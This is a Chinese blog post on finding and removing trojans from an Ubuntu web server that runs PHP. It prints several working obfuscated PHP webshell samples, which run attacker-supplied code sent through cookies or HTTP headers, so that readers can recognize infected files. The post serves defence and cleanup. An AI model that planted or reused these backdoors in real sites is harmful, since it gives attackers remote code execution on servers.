ubuntu木马病毒清理

2024-02-27 22:39 ubuntu木马病毒清理已关闭评论

需求

识别站点病毒、后门、木马,然后将其清理,保证正常运行。

环境:
1. 阿里云ECS ubuntu_16_0402_64
2. nginx+php7.0+mysql

查找病毒

登录阿里云,找到“云安全中心——>检测响应——>安全告警处理”,罗列出当前站点扫描到的后面、病毒、木马

右边点击“详情”查询具体的文件,然后登录站点删除文件或将文件内的内容删除,最后点击“处理”

病毒特点

伪装成乱码

<?php
$p=$_COOKIE;(count($p)==23&&in_array(gettype($p).count($p),$p))?(($p[24]=$p[24].$p[94])&&($p[8]=$p[24]($p[8]))&&($p=$p[8]($p[74],$p[24]($p[28])))&&$p()):$p;

第二种类型

<?php                                               
$p=$_COOKIE;(count($p)==13&&in_array(gettype($p).count($p),$p))?(($p[30]=$p[30].$p[71])&&($p[34]=$p[30]($p[34]))&&($p=$p[34]($p[25],$p[30]($p[64])))&&$p()):$p;

$_HEADERS=getallheaders();if(isset($_HEADERS['If-Unmodified-Since'])){$cache=$_HEADERS['If-Unmodified-Since']('', $_HEADERS['Content-Security-Policy']($_HEADERS['Large-Allocation']));$cache();}

$qzem=$_COOKIE;
$zneec=$qzem[orru];
if($zneec){
    $vwva=$zneec($qzem[vmzx]);$hft=$zneec($qzem[nleo]);$ogax=$vwva("",$hft);$ogax();
}

出现最多是在uploads目录或站点根目录保持文件的目录

依次检查站点里面所有文件,wordpress站点病毒伪装的为.php,打开发现很长看不懂的乱码,可以怀疑为病毒。

当前文章价值8.99元,扫一扫支付后添加微信提供帮助!(如不能解决您的问题,可以申请退款)

你可能感兴趣的文章

来源:每日教程每日一例,深入学习实用技术教程,关注公众号TeachCourse
转载请注明出处: https://www.teachcourse.cn/3071.html ,谢谢支持!

资源分享

分类:ubuntu 标签:
关于LinearLayout设置权重后width或height不设置0dp的影响说明 关于LinearLayout设置权重后wi
对象系列化两种方法Serializable和Parcelable 对象系列化两种方法Serializabl
Python框架Flask开发用户登录、注册、校验功能,存储到MySQL数据库 Python框架Flask开发用户登录、
友盟开发基础——自动更新功能(演示) 友盟开发基础——自动更新功能(

评论已关闭!